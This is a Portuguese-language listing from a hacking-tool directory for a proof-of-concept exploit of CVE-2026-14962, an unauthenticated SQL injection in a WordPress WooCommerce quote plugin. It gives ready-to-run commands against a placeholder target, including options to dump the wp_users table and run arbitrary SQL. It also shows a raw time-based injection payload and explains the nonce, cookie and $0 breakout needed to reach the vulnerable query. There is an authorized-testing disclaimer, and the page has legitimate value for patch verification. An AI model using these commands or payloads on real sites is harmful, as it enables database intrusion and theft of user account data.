Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-14962 — Wordpress Plugin ELEX WooCommerce Request a Quote injeção de SQL não autenticada | Kitploit
Ferramentas/GitHubGitHub/cflowsec/cve-2026-14962
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote injeção de SQL não autenticada

Ver Repositório
há 9h 56mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-14962

Plugin WordPress ELEX WooCommerce Request a Quote — injeção SQL não autenticada

ELEX WooCommerce Request a Quote (plugin WordPress elex-request-a-quote) ≤ 2.4.0 — injeção SQL não autenticada através da ação AJAX pública elex_raq_add_to_quote.

Apenas para testes autorizados. Não execute isto contra sistemas que não possui ou para os quais não tem permissão de teste.

Requer: Python 3, apenas biblioteca padrão. O alvo deve estar a executar WooCommerce (os scripts/nonce de orçamento são impressos na página da loja/inicial).

root@kitploit:~
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
FlagO que faz
-u / --urlRaiz do site WordPress (obrigatório). http:// ou https://; um hostname é tentado primeiro como HTTPS, depois HTTP. TLS autoassinado é repetido automaticamente. --insecure ignora a verificação desde o início
--testConvidado: versão do plugin + nonce público, depois uma sonda SQL não destrutiva $0
--dumpPrimeira linha de wp_users + utilizador da BD. Requer WP_DEBUG para que o erro XPATH esteja no corpo HTTP
--query SQLA sua própria expressão SQL (sem aspas simples; use 0x… hexadecimal para strings)
--sql EXPRdata[id] em bruto após o breakout $0$0 (você escreve o gadget ) OR … #)
--sleep NTentativa baseada em tempo SLEEP(N)
--pid / --vidIDs de produto / variação WooCommerce (a variação deve ser não vazia para atingir o sink)
--insecureIgnorar verificação TLS
--timeoutSegundos de timeout HTTP (predefinição 30)

Não autenticado. O nonce é impresso em request_a_quote_ajax_obj em / e /shop/. O cookie de convidado é request_a_quote_user_coockie (a grafia do plugin).

--test envia POST attribute_value=$0. O preg_replace vulnerável da 2.4.0 trata $0 como a correspondência %s e deixa um %d literal na consulta. A 2.4.1 vincula JSON_CONTAINS e $0 é apenas um valor JSON.

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP.

CVE: CVE-2026-14962. Changelog do plugin 2.4.1.

Working PoC

Baixar ferramenta